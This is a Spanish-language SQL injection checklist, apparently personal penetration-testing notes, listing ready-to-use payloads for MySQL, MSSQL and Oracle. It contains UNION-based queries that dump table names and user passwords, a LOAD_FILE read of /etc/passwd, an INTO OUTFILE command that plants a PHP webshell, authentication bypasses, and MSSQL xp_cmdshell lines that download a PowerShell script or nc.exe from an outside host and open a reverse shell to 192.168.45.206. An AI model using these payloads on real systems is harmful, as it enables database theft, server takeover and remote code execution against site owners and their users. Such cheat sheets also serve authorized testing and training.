$

Inyecciones SQL - Checklist

#sqli#web

MySQL

Obtener el número de columnas

-1 ORDER BY 3;#
-1 ORDER BY 3;-- -

Obtener la versión

-1 UNION SELECT 1,VERSION(),3;#

Obtener el nombre de la base de datos en uso

-1 UNION SELECT 1,DATABASE(),3;#

Obtener nombre de las tablas

-1 UNION SELECT 1,2, GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="<DATABASE>";#

Obtener el nombre de las columnas

-1 UNION SELECT 1,2, GROUP_CONCAT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA="<DATABASE>" AND TABLE_NAME="<TABLE>";#

Leer un archivo

SELECT LOAD_FILE('/etc/passwd')

Dump Data

-1 UNION SELECT 1,2, GROUP_CONCAT(<COLUMN>) FROM <DATABASE>.<TABLE>;#

Crear una Webshell

LOAD_FILE('/etc/httpd/conf/httpd.conf')
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE "/var/www/html/<FILE>.php";

LOAD_FILE('/etc/httpd/conf/httpd.conf')
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/<FILE>.php" -- //

MSSQL

Bypass de Autenticación

' or 1=1--

Obtener la versión con una Time-Based Injection

' SELECT @@version; WAITFOR DELAY '00:00:10';

Habilitar xp_cmdshell

' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--

Ejeecución Remota de Comandos (RCE)

' exec xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://<LHOST>/<FILE>.ps1')" ;--

' EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.206:/nc.exe C:\windows\temp\nc.exe';EXEC xp_cmdshell 'C:\windows\temp\nc.exe 192.168.45.206 4444 -e cmd.exe';--

Oracle SQL

Bypass de Autenticación

' or 1=1--

Obtener el número de columnas

' order by 3--

Obtener el nombre de la tabla

' union select null,table_name,null from all_tables--

Obtener el nombre de la columna

' union select null,column_name,null from all_tab_columns where table_name='<TABLE>'--

Dump Data

' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS--

Error-based SQL Injection (SQLi)

<USERNAME>' OR 1=1 -- //

Genera la siguiente consulta

SELECT * FROM users WHERE user_name= '<USERNAME>' OR 1=1 --

' or 1=1 in (select @@version) -- //
' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //
' or 1=1 in (SELECT password FROM users WHERE username = 'admin') -- //

UNION-based SQL Injection (SQLi)

Inyección SQL manual - Pasos

$query = "SELECT * FROM customers WHERE name LIKE '".$_POST["search"]."%'";

' ORDER BY 1-- //

%' UNION SELECT database(), user(), @@version, null, null -- //

%' UNION SELECT database(), user(), @@version, null, null -- //

' UNION SELECT null, null, database(), user(), @@version  -- //

' UNION SELECT null, table_name, column_name, table_schema, null FROM information_schema.columns WHERE table_schema=database() -- //

' UNION SELECT null, username, password, description, null FROM users -- //

Blind SQL Injection (SQLi)

http://<RHOST>/index.php?user=<USERNAME>' AND 1=1 -- //

http://<RHOST>/index.php?user=<USERNAME>' AND 1=1 -- //

SQL Truncation Attack

'admin@<FQDN>' = 'admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb'